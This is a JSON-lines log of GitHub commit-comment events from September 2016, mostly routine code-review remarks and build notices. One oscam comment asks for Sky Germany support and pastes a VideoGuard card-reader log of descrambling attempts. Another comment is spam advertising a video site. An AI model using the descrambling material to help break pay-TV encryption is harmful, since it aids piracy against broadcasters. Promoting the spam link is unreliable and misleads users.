{"id":"4573672075","type":"CommitCommentEvent","actor":{"login":"yyuho"},"repo":{"name":"aidma-playground/socket.io-chat"},"payload":{"comment":{"id":19053074,"position":6,"line":24,"path":"client.js","commit_id":"f66d252dfc83ca4110c3ea91eba41b97183b4dde","created_at":"2016-09-16T12:07:35Z","updated_at":"2016-09-16T12:07:35Z","body":"確かにわざわざ args を作るのは無駄でした。\r\n修正しました。\r\nhttps://github.com/aidma-playground/socket.io-chat/commit/765958909238e55ed9814d87b39c38041102493b"}},"created_at":"2016-09-16T12:07:35Z"}
{"id":"4573679637","type":"CommitCommentEvent","actor":{"login":"vipul-sharma20"},"repo":{"name":"Amey-Jain/irc-bot"},"payload":{"comment":{"id":19053090,"position":42,"line":35,"path":"bot.py","commit_id":"1e9652606e887efde50763a61fad6ea769e9f7b6","created_at":"2016-09-16T12:09:22Z","updated_at":"2016-09-16T12:09:22Z","body":"prefer opening files using `with` statement: \r\n    \r\n    with open(logfile, 'a') as f:\r\n         # do something"}},"created_at":"2016-09-16T12:09:22Z"}
{"id":"4573681440","type":"CommitCommentEvent","actor":{"login":"yyuho"},"repo":{"name":"aidma-playground/socket.io-chat"},"payload":{"comment":{"id":19053094,"position":5,"line":23,"path":"client.js","commit_id":"f66d252dfc83ca4110c3ea91eba41b97183b4dde","created_at":"2016-09-16T12:09:52Z","updated_at":"2016-09-16T12:09:52Z","body":"知人の影響だと思います…。以後気をつけます。\r\n修正しました。https://github.com/aidma-playground/socket.io-chat/commit/74ba4358c8397c43d3a9fb63635b481fef0d1330"}},"created_at":"2016-09-16T12:09:52Z"}
{"id":"4573684282","type":"CommitCommentEvent","actor":{"login":"mrquincle"},"repo":{"name":"crownstone/bluenet"},"payload":{"comment":{"id":19053103,"position":null,"line":null,"path":null,"commit_id":"a9029b8548b9ca680b622b6b0498f07f00ab336c","created_at":"2016-09-16T12:10:35Z","updated_at":"2016-09-16T12:10:35Z","body":"@vliedel I reverted by accident to one commit too far. I rereverted to after you change.\r\n\r\nSee https://github.com/crownstone/bluenet/blob/sdk_11/src/drivers/cs_PWM.cpp. "}},"created_at":"2016-09-16T12:10:35Z"}
{"id":"4573689622","type":"CommitCommentEvent","actor":{"login":"Sagar1998"},"repo":{"name":"CyanogenMod/android_device_motorola_clark"},"payload":{"comment":{"id":19053117,"position":9,"line":579,"path":"rootdir/init.qcom.rc","commit_id":"7b3cc7e1174f50eff24f1d363b3425814c94fa03","created_at":"2016-09-16T12:11:54Z","updated_at":"2016-09-16T12:11:54Z","body":"Yo"}},"created_at":"2016-09-16T12:11:54Z"}
{"id":"4573690518","type":"CommitCommentEvent","actor":{"login":"jrah"},"repo":{"name":"matthewmorek/wfp-volunteer"},"payload":{"comment":{"id":19053122,"position":null,"line":null,"path":null,"commit_id":"bfa60594dfaf7bbff48dce1b52acc3ed0d4f6b97","created_at":"2016-09-16T12:12:09Z","updated_at":"2016-09-16T12:12:09Z","body":"Ref #2"}},"created_at":"2016-09-16T12:12:09Z"}
{"id":"4573691012","type":"CommitCommentEvent","actor":{"login":"jrah"},"repo":{"name":"matthewmorek/wfp-volunteer"},"payload":{"comment":{"id":19053124,"position":null,"line":null,"path":null,"commit_id":"35d4e2dae2d4dea3e34f6a9049dfd5aeb25a8c1a","created_at":"2016-09-16T12:12:16Z","updated_at":"2016-09-16T12:12:16Z","body":"Ref #2"}},"created_at":"2016-09-16T12:12:16Z"}
{"id":"4573691404","type":"CommitCommentEvent","actor":{"login":"jrah"},"repo":{"name":"matthewmorek/wfp-volunteer"},"payload":{"comment":{"id":19053125,"position":null,"line":null,"path":null,"commit_id":"3caa1aaafeac2fe13c295c1140af23aa2ab403dc","created_at":"2016-09-16T12:12:22Z","updated_at":"2016-09-16T12:12:22Z","body":"Ref #2"}},"created_at":"2016-09-16T12:12:22Z"}
{"id":"4573691868","type":"CommitCommentEvent","actor":{"login":"jrah"},"repo":{"name":"matthewmorek/wfp-volunteer"},"payload":{"comment":{"id":19053126,"position":null,"line":null,"path":null,"commit_id":"d88d7354a4bdfc4bd9734533776addc48b9d9961","created_at":"2016-09-16T12:12:28Z","updated_at":"2016-09-16T12:12:28Z","body":"Ref #2"}},"created_at":"2016-09-16T12:12:28Z"}
{"id":"4573692265","type":"CommitCommentEvent","actor":{"login":"jrah"},"repo":{"name":"matthewmorek/wfp-volunteer"},"payload":{"comment":{"id":19053129,"position":null,"line":null,"path":null,"commit_id":"253efa5d65afad785d2b1785d558217304b2cdd9","created_at":"2016-09-16T12:12:36Z","updated_at":"2016-09-16T12:12:36Z","body":"Ref #2"}},"created_at":"2016-09-16T12:12:36Z"}
{"id":"4573692621","type":"CommitCommentEvent","actor":{"login":"jrah"},"repo":{"name":"matthewmorek/wfp-volunteer"},"payload":{"comment":{"id":19053130,"position":null,"line":null,"path":null,"commit_id":"fa1e0a6e6b66bdc57efdf65de521bb3793bb2cd9","created_at":"2016-09-16T12:12:41Z","updated_at":"2016-09-16T12:12:41Z","body":"Ref #2"}},"created_at":"2016-09-16T12:12:41Z"}
{"id":"4573692978","type":"CommitCommentEvent","actor":{"login":"jrah"},"repo":{"name":"matthewmorek/wfp-volunteer"},"payload":{"comment":{"id":19053131,"position":null,"line":null,"path":null,"commit_id":"59bf7f7553f801e2ce6190cf854db2a7e1d4093e","created_at":"2016-09-16T12:12:47Z","updated_at":"2016-09-16T12:12:47Z","body":"Ref #2"}},"created_at":"2016-09-16T12:12:47Z"}
{"id":"4573694414","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/bahn.guru"},"payload":{"comment":{"id":19053135,"position":null,"line":null,"path":null,"commit_id":"092ff7850bfe550efb8eb6c1e2e131cf57cb1e34","created_at":"2016-09-16T12:13:10Z","updated_at":"2016-09-16T12:13:10Z","body":"I meant \"remove\" in the title."}},"created_at":"2016-09-16T12:13:10Z"}
{"id":"4573699405","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053148,"position":null,"line":null,"path":null,"commit_id":"4fe661a91db2dc1622576ca37ffc314e74323965","created_at":"2016-09-16T12:14:28Z","updated_at":"2016-09-16T12:14:28Z","body":"TeamCity Todo :: Build [Build 105](http://109.103.226.38:8512/viewLog.html?buildId=38500&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-16T12:14:28Z"}
{"id":"4573699719","type":"CommitCommentEvent","actor":{"login":"Khanberbatch"},"repo":{"name":"htmlacademy-adaptive/207822-sedona"},"payload":{"comment":{"id":19053149,"position":5,"line":8,"path":"sass/blocks/feature.scss","commit_id":"420be708621f2ff310a10a4375223d9d5e4c94b6","created_at":"2016-09-16T12:14:33Z","updated_at":"2016-09-16T12:14:33Z","body":"А в таком случае как правильно сделать? \r\n![12345](https://cloud.githubusercontent.com/assets/20758545/18585542/ba4bada6-7c41-11e6-81ee-1bcf01e3d70a.JPG)\r\n"}},"created_at":"2016-09-16T12:14:33Z"}
{"id":"4573700113","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053150,"position":null,"line":null,"path":null,"commit_id":"4fe661a91db2dc1622576ca37ffc314e74323965","created_at":"2016-09-16T12:14:38Z","updated_at":"2016-09-16T12:14:38Z","body":"TeamCity Todo :: Build [Build 105](http://109.103.226.38:8512/viewLog.html?buildId=38500&buildTypeId=Todo_Build) outcome was **FAILURE**\nSummary: Tests passed: 20; exit code 1 (new) Build time: 00:00:11"}},"created_at":"2016-09-16T12:14:38Z"}
{"id":"4573700371","type":"CommitCommentEvent","actor":{"login":"briandesouza"},"repo":{"name":"briandesouza/briandesouza.github.io"},"payload":{"comment":{"id":19053151,"position":null,"line":null,"path":null,"commit_id":"fb52f40679cc1f4ce6dbec6db067b98e5e5552a2","created_at":"2016-09-16T12:14:42Z","updated_at":"2016-09-16T12:14:42Z","body":"Aligator Testing"}},"created_at":"2016-09-16T12:14:42Z"}
{"id":"4573702446","type":"CommitCommentEvent","actor":{"login":"yyuho"},"repo":{"name":"aidma-playground/socket.io-chat"},"payload":{"comment":{"id":19053156,"position":13,"line":31,"path":"client.js","commit_id":"f66d252dfc83ca4110c3ea91eba41b97183b4dde","created_at":"2016-09-16T12:15:14Z","updated_at":"2016-09-16T12:15:14Z","body":"`true`を与えるとカーソルの位置が保持されるようになります。\r\nこのようにしないと、他ユーザの発言や出入りが出力されるたびにカーソルが行の先頭に戻ってしまい、発言をタイプするのが難しくなってしまいます。\r\nhttps://nodejs.org/api/readline.html#readline_rl_prompt_preservecursor"}},"created_at":"2016-09-16T12:15:14Z"}
{"id":"4573707308","type":"CommitCommentEvent","actor":{"login":"ceasbz"},"repo":{"name":"lucianopf/cep-promise"},"payload":{"comment":{"id":19053164,"position":33,"line":108,"path":"src/cep-promise.js","commit_id":"3ecc0a7757656b198b8d4c5e826e297af4562ece","created_at":"2016-09-16T12:16:26Z","updated_at":"2016-09-16T12:16:26Z","body":"@lucianopf Se não for tratar o retorno nas própria promessa e gostaria de simplesmente resolver e rejeitar o valor, você pode fazer essa forma:\r\n\r\n```js\r\nreturn fetchViaCepService(cepWithLeftPad)\r\n  .then(response => return resolve(response))\r\n  .catch(error => return reject(error))\r\n```\r\nApenas uma sugestão :D"}},"created_at":"2016-09-16T12:16:26Z"}
{"id":"4573707685","type":"CommitCommentEvent","actor":{"login":"keyten"},"repo":{"name":"quentint/long-press"},"payload":{"comment":{"id":19053167,"position":null,"line":null,"path":null,"commit_id":"aa440f7b6866cff697a900d69e64bba9980651a7","created_at":"2016-09-16T12:16:31Z","updated_at":"2016-09-16T12:16:31Z","body":"Lol\r\nWhy have I done this?"}},"created_at":"2016-09-16T12:16:31Z"}
{"id":"4573708394","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19053170,"position":null,"line":null,"path":null,"commit_id":"c990c5d67e10939b8e85b95e46ea00b7227c5e40","created_at":"2016-09-16T12:16:41Z","updated_at":"2016-09-16T12:16:41Z","body":"先放在里边，避免有忘记被改的情况。\r\n\r\n另外你需要给它加上指定配置文件的功能。最好还加上 `setup.py`。"}},"created_at":"2016-09-16T12:16:41Z"}
{"id":"4573708908","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"anael-seghezzi/CToy"},"payload":{"comment":{"id":19053173,"position":12,"line":100,"path":"src/CMakeLists.txt","commit_id":"4690573d91ac28fe0f60907be5ce8daaae99c50c","created_at":"2016-09-16T12:16:47Z","updated_at":"2016-09-16T12:16:47Z","body":"Would it be safer to enclose also this CMake variable by quotation characters in two more lines?"}},"created_at":"2016-09-16T12:16:47Z"}
{"id":"4573709131","type":"CommitCommentEvent","actor":{"login":"FFTEAM"},"repo":{"name":"nx111/oscam"},"payload":{"comment":{"id":19053175,"position":null,"line":null,"path":null,"commit_id":"4312e2c8279fa7746017d25df7cfc6d675faaa46","created_at":"2016-09-16T12:16:51Z","updated_at":"2016-09-16T12:16:51Z","body":"098c sky germany please add\r\n\r\n2016/09/16 14:14:32 66BECD07 c      (ecm) root (098C@000000/0B58/0074/9D:C535C82A67A30A1AB8428E5C6F4C99BE:0F0600100000000A:Sky Cinema HD): not found (1 ms) by sky_v14-1234567 - Sky Action HD\r\n2016/09/16 14:14:32 087D96AA r   (reader) sky_v14-1234567 [videoguard2] cardreader_do_checkhealth: reader->card_status = 2, ret = 1\r\n2016/09/16 14:14:32 66BECD07 c   (dvbapi) Demuxer 0 restarting decodingrequests after 0 ms with 1 enabled and 2 disabled ecmpids!\r\n2016/09/16 14:14:32 66BECD07 c   (dvbapi) Demuxer 0 trying to descramble PID 2 CAID 098C PROVID 000000 ECMPID 1A11 ANY CHID PMTPID 0063 VPID 03FF\r\n2016/09/16 14:14:32 087D96AA r   (reader) sky_v14-1234567 [videoguard2] write to cardreader\r\n2016/09/16 14:14:32 087D96AA r   (reader)   D1 5C 00 00 04 \r\n2016/09/16 14:14:32 087D96AA r   (reader) sky_v14-1234567 [videoguard2] Answer from cardreader:\r\n2016/09/16 14:14:32 087D96AA r   (reader)   00 00 00 00 90 00 \r\n2016/09/16 14:14:33 087D96AA r   (reader) sky_v14-1234567 [videoguard2] cardreader_do_checkhealth: reader->card_status = 2, ret = 1\r\n2016/09/16 14:14:33 087D96AA r   (reader) sky_v14-1234567 [videoguard2] cardreader_do_ecm: cardreader_do_checkhealth returned rc=1\r\n2016/09/16 14:14:33 087D96AA r   (reader) sky_v14-1234567 [videoguard2] write to cardreader\r\n2016/09/16 14:14:33 087D96AA r   (reader)   D1 40 00 80 79 00 7D 0B 0C EF 27 01 C3 B5 26 89 \r\n2016/09/16 14:14:33 087D96AA r   (reader)   E0 00 00 90 69 C1 01 EE 86 3B 6D 78 26 7A C0 A9 \r\n2016/09/16 14:14:33 087D96AA r   (reader)   A3 AA 99 6D BE 5B 78 FF 4A 6E C3 B4 D1 59 19 B9 \r\n2016/09/16 14:14:33 087D96AA r   (reader)   7D E3 1D DB 45 4F 11 5F 56 32 41 4B 32 CC 79 C1 \r\n2016/09/16 14:14:33 087D96AA r   (reader)   F0 71 2B DB BC 9B 46 D1 6F 5D 4B 32 6B 9C 8C 8D \r\n2016/09/16 14:14:33 087D96AA r   (reader)   F4 6F 55 15 0F 88 F3 47 51 45 CB 62 14 2B FB 58 \r\n2016/09/16 14:14:33 087D96AA r   (reader)   28 4A F9 21 49 E2 F8 1A 66 EB 7A 58 35 91 D6 D8 \r\n2016/09/16 14:14:33 087D96AA r   (reader)   F4 88 EA 5E 42 F4 6F 03 02 6D 22 AD 83 94 \r\n2016/09/16 14:14:33 087D96AA r   (reader) sky_v14-1234567 [videoguard2] Answer from cardreader:\r\n2016/09/16 14:14:33 087D96AA r   (reader)   90 00 \r\n2016/09/16 14:14:33 087D96AA r   (reader) sky_v14-1234567 [videoguard2] write to cardreader\r\n2016/09/16 14:14:33 087D96AA r   (reader)   D3 54 00 00 5E \r\n2016/09/16 14:14:33 087D96AA r   (reader) sky_v14-1234567 [videoguard2] Answer from cardreader:\r\n2016/09/16 14:14:33 087D96AA r   (reader)   69 E3 6D E2 A7 13 BE 49 B2 C9 12 AE 26 FB B3 48 \r\n2016/09/16 14:14:33 087D96AA r   (reader)   B7 DA B7 2B EC A1 38 D1 A3 B7 AD 05 F5 A4 C2 AD \r\n2016/09/16 14:14:33 087D96AA r   (reader)   79 E9 8B 24 75 9F E3 3A 5F 33 58 81 CA BF 42 E5 \r\n2016/09/16 14:14:33 087D96AA r   (reader)   54 63 08 50 C2 DD F3 EE E0 EB 3C 48 37 CA F2 4E \r\n2016/09/16 14:14:33 087D96AA r   (reader)   11 17 2B B1 B2 25 A6 7A 39 F7 46 63 DC D4 A8 EA \r\n2016/09/16 14:14:33 087D96AA r   (reader)   CE 50 96 7C 21 3B 89 CA 12 E2 A2 B0 4E EF 90 00 \r\n2016/09/16 14:14:33 087D96AA r   (reader) sky_v14-1234567 [videoguard2] Decrypted payload\r\n2016/09/16 14:14:33 087D96AA r   (reader)   00 00 00 00 00 00 00 00 00 00 00 3E 00 00 22 02 \r\n2016/09/16 14:14:33 087D96AA r   (reader)   00 80 0E 02 00 00 0F 06 00 10 00 00 00 0A 20 04 \r\n2016/09/16 14:14:33 087D96AA r   (reader)   00 00 00 00 25 11 00 00 00 00 00 00 00 00 00 00 \r\n2016/09/16 14:14:33 087D96AA r   (reader)   00 00 00 00 00 00 00 2A 04 00 3E 00 00 55 01 A0 \r\n2016/09/16 14:14:33 087D96AA r   (reader)   56 08 00 00 00 00 00 00 00 00 2B 02 00 00 \r\n2016/09/16 14:14:33 087D96AA r   (reader) sky_v14-1234567 [videoguard2] classD3 ins54: no cw --> Card needs pairing/extra data\r\n2016/09/16 14:14:33 087D96AA r   (reader) sky_v14-1234567 [videoguard2] classD3 ins54: no cw --> Card is paired! (Debug-ECM-Info: 0F_06 00 10 00 00 00 0A)\r\n2016/09/16 14:14:33 087D96AA r   (reader) sky_v14-1234567 [videoguard2] cardreader_do_ecm: after csystem->do_ecm rc=0\r\n2016/09/16 14:14:33 087D96AA r   (reader) sky_v14-1234567 [videoguard2] cardreader_do_ecm: ret rc=0\r\n2016/09/16 14:14:33 087D96AA r   (reader) sky_v14-1234567 [videoguard2] cardreader_process_ecm: cardreader_do_ecm returned rc=0 (ERROR=0)\r\n2016/09/16 14:14:33 087D96AA r   (reader) sky_v14-1234567 [videoguard2] Error processing ecm for caid 098C, provid 000000, srvid 0074, servicename: Sky Action HD\r\n2016/09/16 14:14:33 087D96AA r   (reader) sky_v14-1234567 [videoguard2] ecm hash: C535C82A67A30A1AB8428E5C6F4C99BE real time: 96 ms\r\n2016/09/16 14:14:33 66BECD07 c      (ecm) root (098C@000000/0B58/0074/9D:C535C82A67A30A1AB8428E5C6F4C99BE:0F0600100000000A:Sky Cinema HD): not found (97 ms) by sky_v14-1234567 - Sky Action HD\r\n"}},"created_at":"2016-09-16T12:16:51Z"}
{"id":"4573712738","type":"CommitCommentEvent","actor":{"login":"fyvfyv"},"repo":{"name":"htmlacademy-adaptive/207822-sedona"},"payload":{"comment":{"id":19053181,"position":5,"line":8,"path":"sass/blocks/feature.scss","commit_id":"420be708621f2ff310a10a4375223d9d5e4c94b6","created_at":"2016-09-16T12:17:40Z","updated_at":"2016-09-16T12:17:40Z","body":"```css\r\n.reason {\r\n  &--grey {...}\r\n}\r\n\r\n.reason--grey {\r\n  .reason__title {}\r\n}\r\n```\r\nМожно сделать вот так.\r\nМожно оставить как у тебя.\r\n\r\nНо лично я предпочитаю сделать модификаторы всем элементам, которые изменяются. Чтобы было\r\n```css\r\n.reason {\r\n  &--grey {}\r\n}\r\n.reason__title {\r\n  &--grey {}\r\n}\r\n```\r\nС одной стороны это приводит к большему количеству кода в разметке и кажется лишним, но с другой, мне потом ничего не мешает использовать `reason-title--grey` вне блока `reason--grey`, за счет того, что стили оказались независимы"}},"created_at":"2016-09-16T12:17:40Z"}
{"id":"4573713287","type":"CommitCommentEvent","actor":{"login":"snipe"},"repo":{"name":"snipe/snipe-it"},"payload":{"comment":{"id":19053182,"position":null,"line":null,"path":null,"commit_id":"04898c49b245f9db4417cee414c23073e5b2e395","created_at":"2016-09-16T12:17:47Z","updated_at":"2016-09-16T12:17:47Z","body":"The translation already existed, that's all."}},"created_at":"2016-09-16T12:17:47Z"}
{"id":"4573714881","type":"CommitCommentEvent","actor":{"login":"RomanShumkov"},"repo":{"name":"RomanShumkov/EcentriaRestBundle"},"payload":{"comment":{"id":19053185,"position":null,"line":null,"path":null,"commit_id":"101aea955c92239d0a7f84e2930e976372c762e3","created_at":"2016-09-16T12:18:11Z","updated_at":"2016-09-16T12:18:11Z","body":"@inferont, it's merged and released as [ecentria/ecentria-rest-bundle v0.3.2](https://github.com/ecentria/EcentriaRestBundle/releases/tag/0.3.2) already :)"}},"created_at":"2016-09-16T12:18:11Z"}
{"id":"4573715836","type":"CommitCommentEvent","actor":{"login":"pashokkumar"},"repo":{"name":"pashokkumar/mindstuffs-blog"},"payload":{"comment":{"id":19053187,"position":null,"line":null,"path":null,"commit_id":"80920088885761a991554a9cf74e486fdeebef61","created_at":"2016-09-16T12:18:25Z","updated_at":"2016-09-16T12:18:25Z","body":"Cname added"}},"created_at":"2016-09-16T12:18:25Z"}
{"id":"4573717204","type":"CommitCommentEvent","actor":{"login":"michaelklishin"},"repo":{"name":"rabbitmq/rabbitmq-management"},"payload":{"comment":{"id":19053188,"position":19,"line":134,"path":"test/rabbit_mgmt_clustering_SUITE.erl","commit_id":"235d6b7d1dcd63f01b5d3762e2b6c6363538dec9","created_at":"2016-09-16T12:18:43Z","updated_at":"2016-09-16T12:18:43Z","body":"This will change with the move to Cowboy, so perhaps we should alias this via our own macro (`?SUCCESSFUL_DELETE_RESPONSE`?) and only change that when Cowboy is merged."}},"created_at":"2016-09-16T12:18:43Z"}
{"id":"4573719261","type":"CommitCommentEvent","actor":{"login":"Plamen5kov"},"repo":{"name":"NativeScript/android-runtime"},"payload":{"comment":{"id":19053192,"position":403,"line":222,"path":"runtime/src/main/java/com/tns/Runtime.java","commit_id":"90b76f9a182b5eea47394bfbf4b3e1b3878baa50","created_at":"2016-09-16T12:19:13Z","updated_at":"2016-09-16T12:19:13Z","body":"There can't be any resend, at least for the post message or if there is, we need to implement additional logic to capture the order of the passed messages, so we can execute them in the right order, when the thread is initialized.\r\nThe logic for sending a handshake with the main thread can stay, I'm just saying the new `WorkerThreadHandler` initialization needs to happen in the constructor. From there on out we can block handling the messages till the worker is initialized, but we won't have to take care of the order of the messages."}},"created_at":"2016-09-16T12:19:13Z"}
{"id":"4573719647","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ayende/ravendb"},"payload":{"comment":{"id":19053195,"position":5,"line":25,"path":"tools/TypingsGenerator/Program.cs","commit_id":"a92493e5ed5ff12043df165bfba50e5f739fc523","created_at":"2016-09-16T12:19:19Z","updated_at":"2016-09-16T12:19:19Z","body":"@myarichuk  Why did you commented out this? "}},"created_at":"2016-09-16T12:19:19Z"}
{"id":"4573720546","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19053198,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-16T12:19:34Z","updated_at":"2016-09-16T12:19:34Z","body":"Pauda\r\n![logo-pronote-menu](https://cloud.githubusercontent.com/assets/22102135/18585665/43781dbe-7be6-11e6-880d-abefc6230946.png)\r\n![logo-pronote-menu](https://cloud.githubusercontent.com/assets/22102135/18585666/49018022-7be6-11e6-9a98-6924d86807f6.png)\r\n\r\n"}},"created_at":"2016-09-16T12:19:34Z"}
{"id":"4573722898","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19053201,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-16T12:20:11Z","updated_at":"2016-09-16T12:20:11Z","body":"![panda_cub_from_wolong _sichuan _china](https://cloud.githubusercontent.com/assets/22102135/18585682/5d19abca-7be6-11e6-9e62-a5a4ed551c28.JPG)\r\n"}},"created_at":"2016-09-16T12:20:11Z"}
{"id":"4573725881","type":"CommitCommentEvent","actor":{"login":"MistaKevin"},"repo":{"name":"josephsachs/jobskee-open-source-job-board"},"payload":{"comment":{"id":19053207,"position":5,"line":24,"path":"views/admin/header.php","commit_id":"1cb64a9f9e1f7bbf45cb085f529cd00f4ff5300c","created_at":"2016-09-16T12:20:55Z","updated_at":"2016-09-16T12:20:55Z","body":"Cool, this is a good start. Now we should be able to remove that checked in library from the repo. Create a branch and then a pull request with these changes, then we can get started on all the libraries in https://github.com/AustinCodingAcademy/jobskee-open-source-job-board/tree/master/views/admin/assets and https://github.com/AustinCodingAcademy/jobskee-open-source-job-board/tree/master/views/default/assets"}},"created_at":"2016-09-16T12:20:55Z"}
{"id":"4573726584","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19053211,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-16T12:21:05Z","updated_at":"2016-09-16T12:21:05Z","body":"@Felp86120502 "}},"created_at":"2016-09-16T12:21:05Z"}
{"id":"4573729298","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053221,"position":null,"line":null,"path":null,"commit_id":"afcfea1ebe80ddd6f65b605ba736c83d6707922a","created_at":"2016-09-16T12:21:44Z","updated_at":"2016-09-16T12:21:44Z","body":"TeamCity Todo :: Build [Build 106](http://109.103.226.38:8512/viewLog.html?buildId=38501&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-16T12:21:44Z"}
{"id":"4573730300","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053223,"position":null,"line":null,"path":null,"commit_id":"afcfea1ebe80ddd6f65b605ba736c83d6707922a","created_at":"2016-09-16T12:21:58Z","updated_at":"2016-09-16T12:21:58Z","body":"TeamCity Todo :: Build [Build 106](http://109.103.226.38:8512/viewLog.html?buildId=38501&buildTypeId=Todo_Build) outcome was **FAILURE**\nSummary: Tests passed: 25; exit code 1 (new) Build time: 00:00:14"}},"created_at":"2016-09-16T12:21:58Z"}
{"id":"4573731087","type":"CommitCommentEvent","actor":{"login":"kjnilsson"},"repo":{"name":"rabbitmq/rabbitmq-management"},"payload":{"comment":{"id":19053226,"position":19,"line":134,"path":"test/rabbit_mgmt_clustering_SUITE.erl","commit_id":"235d6b7d1dcd63f01b5d3762e2b6c6363538dec9","created_at":"2016-09-16T12:22:10Z","updated_at":"2016-09-16T12:22:10Z","body":"@essen has already pushed the Cowboy changes into this branch unless there are more coming?. We had to make some changes for PUT requests already."}},"created_at":"2016-09-16T12:22:10Z"}
{"id":"4573731092","type":"CommitCommentEvent","actor":{"login":"Ingvord"},"repo":{"name":"tango-controls/cppTango"},"payload":{"comment":{"id":19053227,"position":24,"line":24,"path":"cpp_test_suite/CMakeLists.txt","commit_id":"8d7ccfb6b0f88d4ef8000959a8694287af756353","created_at":"2016-09-16T12:22:10Z","updated_at":"2016-09-16T12:22:10Z","body":"old_tests do not compile"}},"created_at":"2016-09-16T12:22:10Z"}
{"id":"4573733745","type":"CommitCommentEvent","actor":{"login":"mehdijjz"},"repo":{"name":"oliviertassinari/material-ui"},"payload":{"comment":{"id":19053237,"position":21,"line":41,"path":"docs/src/app/components/pages/components/DatePicker/ExampleInternational.js","commit_id":"2c8c317f1a815afabc178c6149b7259b3cec77cf","created_at":"2016-09-16T12:22:45Z","updated_at":"2016-09-16T12:22:45Z","body":"i'm a native persian/farsi speaker and I believe this can be changed to `okLabel=\"تایید\"` and `cancelLabel=\"لغو\"`"}},"created_at":"2016-09-16T12:22:45Z"}
{"id":"4573734182","type":"CommitCommentEvent","actor":{"login":"Arpit723"},"repo":{"name":"oarrabi/IAModelBase"},"payload":{"comment":{"id":19053239,"position":null,"line":null,"path":null,"commit_id":"1a0248690002313681fde16ca4a9428830676be0","created_at":"2016-09-16T12:22:51Z","updated_at":"2016-09-16T12:22:51Z","body":"When you have array containing dictionary, then you will have problems, but it is solved below.\r\nhttps://github.com/oarrabi/IAModelBase/pulls, Please see the first Issue.\r\n"}},"created_at":"2016-09-16T12:22:51Z"}
{"id":"4573734607","type":"CommitCommentEvent","actor":{"login":"coladict"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":19053242,"position":null,"line":null,"path":null,"commit_id":"977cbc2fff1a3ec9d29a2c0904fae01bfd64c6c2","created_at":"2016-09-16T12:22:57Z","updated_at":"2016-09-16T12:22:57Z","body":"Wouldn't it be better to have it throw an exception if `select lastval()` fails, because there haven't been any `nextval($1)` calls in the session? It would make it easier to debug for developers who misuse the function. They should know not to ask for the last generated id, without having inserted some data first. Quietly suppressing that error (as done here) helps them learn the wrong lessons."}},"created_at":"2016-09-16T12:22:57Z"}
{"id":"4573736706","type":"CommitCommentEvent","actor":{"login":"Ingvord"},"repo":{"name":"tango-controls/cppTango"},"payload":{"comment":{"id":19053248,"position":6,"line":6,"path":"cppapi/server/idl/CMakeLists.txt","commit_id":"8d7ccfb6b0f88d4ef8000959a8694287af756353","created_at":"2016-09-16T12:23:29Z","updated_at":"2016-09-16T12:23:29Z","body":"See #3 "}},"created_at":"2016-09-16T12:23:29Z"}
{"id":"4573737922","type":"CommitCommentEvent","actor":{"login":"laoyawocom"},"repo":{"name":"laoyawocom/wo"},"payload":{"comment":{"id":19053251,"position":null,"line":null,"path":null,"commit_id":"c05fc1ae0240a931d7630952d071e5f90b3d9061","created_at":"2016-09-16T12:23:47Z","updated_at":"2016-09-16T12:23:47Z","body":"老鸭窝在线视频 最新地址 www.laoyawo.net\r\n\r\nhttp://www.laoyawo.top"}},"created_at":"2016-09-16T12:23:47Z"}
{"id":"4573738505","type":"CommitCommentEvent","actor":{"login":"xiaojinglin"},"repo":{"name":"xiaojinglin/FSJS-Weekly-Challenges"},"payload":{"comment":{"id":19053253,"position":null,"line":null,"path":null,"commit_id":"fd479aa079c10110fdbef9b6d51890fa330ca829","created_at":"2016-09-16T12:23:55Z","updated_at":"2016-09-16T12:23:55Z","body":"week3 challenges"}},"created_at":"2016-09-16T12:23:55Z"}
{"id":"4573738621","type":"CommitCommentEvent","actor":{"login":"rldhont"},"repo":{"name":"SaekBinko/lizmap-web-client"},"payload":{"comment":{"id":19053254,"position":null,"line":null,"path":null,"commit_id":"6d0e21051ee7e812327660964135dd4ce3d37c80","created_at":"2016-09-16T12:23:57Z","updated_at":"2016-09-16T12:23:57Z","body":"We can merge your changes if you want. Just create a pull-request."}},"created_at":"2016-09-16T12:23:57Z"}
{"id":"4573738816","type":"CommitCommentEvent","actor":{"login":"Revilum"},"repo":{"name":"Revilum/Sliger"},"payload":{"comment":{"id":19053256,"position":3,"line":1,"path":"Filename.md","commit_id":"6038ff05b03cfc027ba4c502fdda8d6b404e30ca","created_at":"2016-09-16T12:24:00Z","updated_at":"2016-09-16T12:24:00Z","body":"Sliger/src/Filename.md"}},"created_at":"2016-09-16T12:24:00Z"}
